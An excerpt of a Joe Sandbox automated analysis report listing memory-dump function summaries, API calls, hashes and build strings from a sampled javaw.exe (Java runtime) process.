Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: sun.java.command$sun.jvm.args$sun.jvm.flags
API String ID: 3702945584-3631806203
Opcode ID: 2205140c278a9d924b7aab928cbb5890adc1fd13bffbd85a7c6f106a8a4ba374
Instruction ID: 3572a8424b0252672adb2539e70782c73e344e9025485b1df19887cb13b2c747
Opcode Fuzzy Hash: 2205140c278a9d924b7aab928cbb5890adc1fd13bffbd85a7c6f106a8a4ba374
Instruction Fuzzy Hash: 4E513774904709EFDB18CF64C880BAAB7F1BF48324F05892DE959A7B90D731A958CF91

Function 6D520AA0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 121COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 6D520B2C

Strings

C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp, xrefs: 6D520B6F, 6D520BA6
Constant pool index out of bounds, xrefs: 6D520B5F
Wrong type at constant pool index, xrefs: 6D520B96

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp$Constant pool index out of bounds$Wrong type at constant pool index
API String ID: 3702945584-1335500294
Opcode ID: 87e66888b4a1a4088de88738824c69f0ede9ed98a08733c2e1ea48a00e1b0209
Instruction ID: 359cfa1a0422576bb1bcf3fe8d0bea3e74112ed0da625c3674f264869bb81622
Opcode Fuzzy Hash: 87e66888b4a1a4088de88738824c69f0ede9ed98a08733c2e1ea48a00e1b0209
Instruction Fuzzy Hash: BA41AD71904609AFCB15DF9AC890FAEB7B0FF54314F01892AE9196B790CB31AA15CF91

Function 6D520310 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 120COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 6D52039C

Strings

C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp, xrefs: 6D5203DF, 6D520416
Constant pool index out of bounds, xrefs: 6D5203CF
Wrong type at constant pool index, xrefs: 6D520406

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp$Constant pool index out of bounds$Wrong type at constant pool index
API String ID: 3702945584-1335500294
Opcode ID: ce61c67702dfd56c4bfeede7c960bf0a8d817880557d7f05829b8b72493d2f46
Instruction ID: eada79d7c0dacbb8241d33ae75547a5f881167d90794be606be7d35cd7b33d37
Opcode Fuzzy Hash: ce61c67702dfd56c4bfeede7c960bf0a8d817880557d7f05829b8b72493d2f46
Instruction Fuzzy Hash: 1541EE70905609EFCB14DF99C890FAEBBB0FF44314F01892AE9596B690CB31AA55CB81

Function 6D5207B0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 116COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 6D52083C

Strings

C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp, xrefs: 6D52087F, 6D5208B6
Constant pool index out of bounds, xrefs: 6D52086F
Wrong type at constant pool index, xrefs: 6D5208A6

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp$Constant pool index out of bounds$Wrong type at constant pool index
API String ID: 3702945584-1335500294
Opcode ID: 9dfda9c107ef7864b18523df6c120e7d79a0c5079427f9ad772111aa447ef5a7
Instruction ID: ceff172f8b8f2dbeac1685e93517be560e51c48bf80def1168e3ce1fec7db056
Opcode Fuzzy Hash: 9dfda9c107ef7864b18523df6c120e7d79a0c5079427f9ad772111aa447ef5a7
Instruction Fuzzy Hash: 7641E170905606EBCB08DF5AC890FABB7B0FF44314F01892AE9595B691CB31EA55CFD1

Function 6D520930 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 115COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 6D5209BC

Strings

C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp, xrefs: 6D5209FF, 6D520A36
Constant pool index out of bounds, xrefs: 6D5209EF
Wrong type at constant pool index, xrefs: 6D520A26

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: Value
String ID: C:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u431\1359\hotspot\src\share\vm\prims\jvm.cpp$Constant pool index out of bounds$Wrong type at constant pool index
API String ID: 3702945584-1335500294
Opcode ID: 360bf04848ebecae728a76d4846ef998477ac6914241d49bd8567ebdfc69f69e
Instruction ID: 6c336e73ccab7726e2bf189d08bf7fa3c789c6aaa855f34ae5b0d62b94f7edf4
Opcode Fuzzy Hash: 360bf04848ebecae728a76d4846ef998477ac6914241d49bd8567ebdfc69f69e
Instruction Fuzzy Hash: 7E41F171905605ABCB08DF99C890FAEB7B0BF44314F01892EE95A2B780CB31AD49CB91

Function 00E208DD Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00E1D159: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E242AA,?,00000000,-00000008), ref: 00E1D1BA

GetLastError.KERNEL32 ref: 00E20941
__dosmaperr.LIBCMT ref: 00E20948
GetLastError.KERNEL32(?,?,?,?), ref: 00E20982
__dosmaperr.LIBCMT ref: 00E20989

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: 591f156639da7cc6fb3d86f570370e6c1dd2c29638f8f4986e8aa760a62730f0
Instruction ID: 78b65281b1bbd5c34654f8e4444b3d22111a24d96730628c59a28f7730d36e16
Opcode Fuzzy Hash: 591f156639da7cc6fb3d86f570370e6c1dd2c29638f8f4986e8aa760a62730f0
Instruction Fuzzy Hash: 2C219871604229AFEB20AF65EC41D6BB7A9FFC4368710A519F81AB7193D730EDC08790

Function 6FA54FC4 Relevance: 6.1, APIs: 4, Instructions: 76COMMON

Download Yara Rule

APIs

__RTC_Initialize.LIBCMT ref: 6FA55011

Part of subcall function 6FA554E5: InitializeSListHead.KERNEL32(6FA5FD58,6FA5501B,6FA5E648,00000010,6FA54FAB,?,?,?,6FA551D4,?,00000001,?,?,00000001,?,6FA5E690), ref: 6FA554EA

_initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(6FA560C8,6FA560CC,6FA5E648,00000010,6FA54FAB,?,?,?,6FA551D4,?,00000001,?,?,00000001,?,6FA5E690), ref: 6FA5502A
_initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(6FA560C0,6FA560C4,6FA5E648,00000010,6FA54FAB,?,?,?,6FA551D4,?,00000001,?,?,00000001,?,6FA5E690), ref: 6FA55048
___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6FA5507B

Memory Dump Source

Source File: 00000010.00000002.3208903167.000000006FA41000.00000020.00000001.01000000.00000018.sdmp, Offset: 6FA40000, based on PE: true

Associated: 00000010.00000002.3208878111.000000006FA40000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208933024.000000006FA56000.00000002.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208959533.000000006FA5F000.00000004.00000001.01000000.00000018.sdmpDownload File
Associated: 00000010.00000002.3208984957.000000006FA60000.00000002.00000001.01000000.00000018.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6fa40000_javaw.jbxd

Similarity

API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
String ID:
API String ID: 590286634-0
Opcode ID: e0582309627dcd0278d7f83be621a34b8848b262065a63924e85f185a9bfca13
Instruction ID: c65148a00a6b0ed9f31ea84fffc64a09c5d6127c859dcc57fbc897c594dd4c0d
Opcode Fuzzy Hash: e0582309627dcd0278d7f83be621a34b8848b262065a63924e85f185a9bfca13
Instruction Fuzzy Hash: 5A219D365457459EEB10ABBC8A0479C77B2AF0233CF14855AD4812B2C2DB7E50FECAD6

Function 00E1D9D8 Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00E1D9E0

Part of subcall function 00E1D159: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00E242AA,?,00000000,-00000008), ref: 00E1D1BA

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E1DA18
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00E1DA38

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: d764ef85f047b99d1105419aee4f1bba19f20e5055896092b5a03ef77acde40d
Instruction ID: db9cebea63002ff30e4f96ee4ab0d856176ac5a60575472994f12a44fe1b5e7f
Opcode Fuzzy Hash: d764ef85f047b99d1105419aee4f1bba19f20e5055896092b5a03ef77acde40d
Instruction Fuzzy Hash: 991126F250E505BEA721A7725C8ECFF6B9CCF853A87162024F401F1201FA64CDC182B2

Function 00E060D6 Relevance: 6.1, APIs: 4, Instructions: 58libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00E05702: _strlen.LIBCMT ref: 00E05760

_strlen.LIBCMT ref: 00E0610D
_strlen.LIBCMT ref: 00E0611B
LoadLibraryA.KERNEL32(?), ref: 00E0614D
GetProcAddress.KERNEL32(00000000,?), ref: 00E0615E

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: _strlen$AddressLibraryLoadProc
String ID:
API String ID: 1440712510-0
Opcode ID: 526cc09cc54d78bd2fd92b4e4cd4597b3c4f4653a8b2cd97fdf88c4f9bcd02c8
Instruction ID: 7e1f305fcbb3f04839599c20ead3eaad6730dd1e0a7be27851c3eeb8a8b07fab
Opcode Fuzzy Hash: 526cc09cc54d78bd2fd92b4e4cd4597b3c4f4653a8b2cd97fdf88c4f9bcd02c8
Instruction Fuzzy Hash: 1611827690421DAFDB249F75EC499DA7BFCEB04364B101466F844F3192DA71D9C88A60

Function 00E200DD Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00E2023C,00000000,?,00E2500C,00E2023C,00E2023C,?,?,00000000,00000104,?,00000001), ref: 00E200F3
GetLastError.KERNEL32(?,00E2500C,00E2023C,00E2023C,?,?,00000000,00000104,?,00000001,00000000,00000000,?,00E2023C,?,00000104), ref: 00E200FD
__dosmaperr.LIBCMT ref: 00E20104
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,00E2500C,00E2023C,00E2023C,?,?,00000000,00000104,?,00000001,00000000), ref: 00E2012E

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: 0b62e2f446fbacea4eeb3e2630fae1cc82c9e34e19c7d5b527f4a2a99fc49267
Instruction ID: 8553f1c57d4659fc1890a9dcd1620a993157c387ea9509f0308257bff6a1eed2
Opcode Fuzzy Hash: 0b62e2f446fbacea4eeb3e2630fae1cc82c9e34e19c7d5b527f4a2a99fc49267
Instruction Fuzzy Hash: BDF0C832201311AFEB305F62EC09F97BBE9EF44360B145429F556E2462DB31EC61DB50

Function 00E20143 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,?,?,00000000,00E2023C,00000000,?,00E2507E,00E2023C,?,?,00000000,00000104,?,00000001,00000000), ref: 00E20159
GetLastError.KERNEL32(?,00E2507E,00E2023C,?,?,00000000,00000104,?,00000001,00000000,00000000,?,00E2023C,?,00000104,?), ref: 00E20163
__dosmaperr.LIBCMT ref: 00E2016A
GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,00E2507E,00E2023C,?,?,00000000,00000104,?,00000001,00000000,00000000), ref: 00E20194

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: FullNamePath$ErrorLast__dosmaperr
String ID:
API String ID: 1391015842-0
Opcode ID: b840633fef30d3130f800a57edb2c875482333ac36daef0419c123bcab1bdfa6
Instruction ID: 2b3ac00f94d82057bf338b4f1ed7d8b2140186893f942040e67f2221b5f6e92e
Opcode Fuzzy Hash: b840633fef30d3130f800a57edb2c875482333ac36daef0419c123bcab1bdfa6
Instruction Fuzzy Hash: 56F0C832201211AFEB305F72EC48F97BBE9FF44360B145429F556E2062DB31E861D750

Function 6D5E8D90 Relevance: 6.0, APIs: 4, Instructions: 38fileCOMMON

Download Yara Rule

APIs

_get_osfhandle.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,6D52C1AF,?,?,?), ref: 6D5E8D98
SetFilePointer.KERNEL32(00000000,?,?,00000000), ref: 6D5E8DB8
GetLastError.KERNEL32 ref: 6D5E8DC3
SetEndOfFile.KERNEL32(00000000), ref: 6D5E8DCE

Memory Dump Source

Source File: 00000010.00000002.3208148704.000000006D411000.00000020.00000001.01000000.00000010.sdmp, Offset: 6D410000, based on PE: true

Associated: 00000010.00000002.3208123124.000000006D410000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208367361.000000006D6F6000.00000002.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208435880.000000006D796000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208465304.000000006D797000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208490609.000000006D798000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208513617.000000006D79A000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208537460.000000006D79C000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208563923.000000006D79D000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208588233.000000006D79E000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208611080.000000006D79F000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208636785.000000006D7A7000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208660137.000000006D7A9000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208690761.000000006D7AD000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208713812.000000006D7AE000.00000008.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7B9000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7BC000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7CB000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208741923.000000006D7D1000.00000004.00000001.01000000.00000010.sdmpDownload File
Associated: 00000010.00000002.3208839052.000000006D7D7000.00000002.00000001.01000000.00000010.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_6d410000_javaw.jbxd

Similarity

API ID: File$ErrorLastPointer_get_osfhandle
String ID:
API String ID: 609419947-0
Opcode ID: 4bfe6f2dbbab8db71aebee1434b5b60cbbd9c902fe75ed158e0c6313b3d5fb57
Instruction ID: 7f3adc81886614870c948145813da39289f7ee939a0ab0cdde3c2dc6ade6af6e
Opcode Fuzzy Hash: 4bfe6f2dbbab8db71aebee1434b5b60cbbd9c902fe75ed158e0c6313b3d5fb57
Instruction Fuzzy Hash: D2F09A31905819AFDF00AEA9AC09BA93B79EF02271B100755FC29C62D0EB31995086D2

Function 00E26875 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00E24792,00000000,00000001,00000000,?,?,00E1ED06,?,00000000,00000000), ref: 00E2688C
GetLastError.KERNEL32(?,00E24792,00000000,00000001,00000000,?,?,00E1ED06,?,00000000,00000000,?,?,?,00E1F2E0,00000000), ref: 00E26898

Part of subcall function 00E2685E: CloseHandle.KERNEL32(FFFFFFFE,00E268A8,?,00E24792,00000000,00000001,00000000,?,?,00E1ED06,?,00000000,00000000,?,?), ref: 00E2686E

___initconout.LIBCMT ref: 00E268A8

Part of subcall function 00E26820: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00E2684F,00E2477F,?,?,00E1ED06,?,00000000,00000000,?), ref: 00E26833

WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,00E24792,00000000,00000001,00000000,?,?,00E1ED06,?,00000000,00000000,?), ref: 00E268BD

Memory Dump Source

Source File: 00000010.00000002.3195467281.0000000000E01000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00E00000, based on PE: true

Associated: 00000010.00000002.3195437751.0000000000E00000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195497558.0000000000E29000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195519443.0000000000E36000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000010.00000002.3195540134.0000000000E38000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_e00000_javaw.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 166a4c1ca45d9a6fc330e46db587ee59e7946d4a9d688767c8cfbc134bfcf1fd
